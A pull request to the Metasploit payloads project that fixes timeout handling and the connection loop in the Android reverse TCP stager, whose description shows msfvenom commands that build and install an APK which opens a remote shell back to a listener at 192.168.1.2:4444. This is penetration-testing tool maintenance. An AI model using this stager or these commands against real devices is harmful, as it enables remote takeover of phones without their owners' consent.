### PR TITLE
Fix android/shell/reverse_tcp

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -59,26 +59,31 @@ public class Payload {
         long commTimeout;
         long retryTotal;
         long retryWait;
-        String[] timeouts = TIMEOUTS.substring(4).trim().split("-");
-        try {
-            sessionExpiry = Integer.parseInt(timeouts[0]);
-            commTimeout = Integer.parseInt(timeouts[1]);
-            retryTotal = Integer.parseInt(timeouts[2]);
-            retryWait = Integer.parseInt(timeouts[3]);
-        } catch (NumberFormatException e) {
-            return;
-        }
-
+        long currentTime = -1;
         long payloadStart = System.currentTimeMillis();
-        session_expiry = TimeUnit.SECONDS.toMillis(sessionExpiry) + payloadStart;
-        comm_timeout = TimeUnit.SECONDS.toMillis(commTimeout);
-        retry_total = TimeUnit.SECONDS.toMillis(retryTotal);
-        retry_wait = TimeUnit.SECONDS.toMillis(retryWait);
+        String timeoutString = TIMEOUTS.substring(4).trim();
+        if (timeoutString.length() > 3) {
+            String[] timeouts = timeoutString.split("-");
+            try {
+                sessionExpiry = Integer.parseInt(timeouts[0]);
+                commTimeout = Integer.parseInt(timeouts[1]);
+                retryTotal = Integer.parseInt(timeouts[2]);
+                retryWait = Integer.parseInt(timeouts[3]);
+            } catch (NumberFormatException e) {
+                return;
+            }
+
+            session_expiry = TimeUnit.SECONDS.toMillis(sessionExpiry) + payloadStart;
+            comm_timeout = TimeUnit.SECONDS.toMillis(commTimeout);
+            retry_total = TimeUnit.SECONDS.toMillis(retryTotal);
+            retry_wait = TimeUnit.SECONDS.toMillis(retryWait);
+            currentTime = System.currentTimeMillis();
+        }
 
         String url = URL.substring(4).trim();
         // technically we need to check for session expiry here as well.
-        while (System.currentTimeMillis() < payloadStart + retry_total &&
-            System.currentTimeMillis() < session_expiry) {
+        while (currentTime < payloadStart + retry_total &&
+            currentTime < session_expiry) {
             try {
                 if (url.startsWith("tcp")) {
                     runStagefromTCP(url);
@@ -94,6 +99,7 @@ public class Payload {
             } catch (InterruptedException e) {
               break;
             }
+            currentTime = System.currentTimeMillis();
         }
     }
 

--- a/java/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -133,7 +133,6 @@ public class Payload {
         }
 
         if (sock != null) {
-            sock.setSoTimeout(500);
             DataInputStream in = new DataInputStream(sock.getInputStream());
             OutputStream out = new DataOutputStream(sock.getOutputStream());
             readAndRunStage(in, out, parameters);


### PR DESCRIPTION
Quick change to fix https://github.com/rapid7/metasploit-payloads/issues/21
```
# start a handler:
./msfvenom -p android/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -o met.apk
./tools/exploit/install_msf_apk.sh met.apk
```
 - [ ] android/shell/reverse_tcp gives a working command shell

The loop logic should be the same as before, but the parameters are optional. Not sure why there was a 500ms socket timeout: https://github.com/rapid7/metasploit-payloads/compare/master...timwr:fix_shell_tcp?expand=1#diff-7ddd6df9cd633823122e4be1d14c4af6L130?
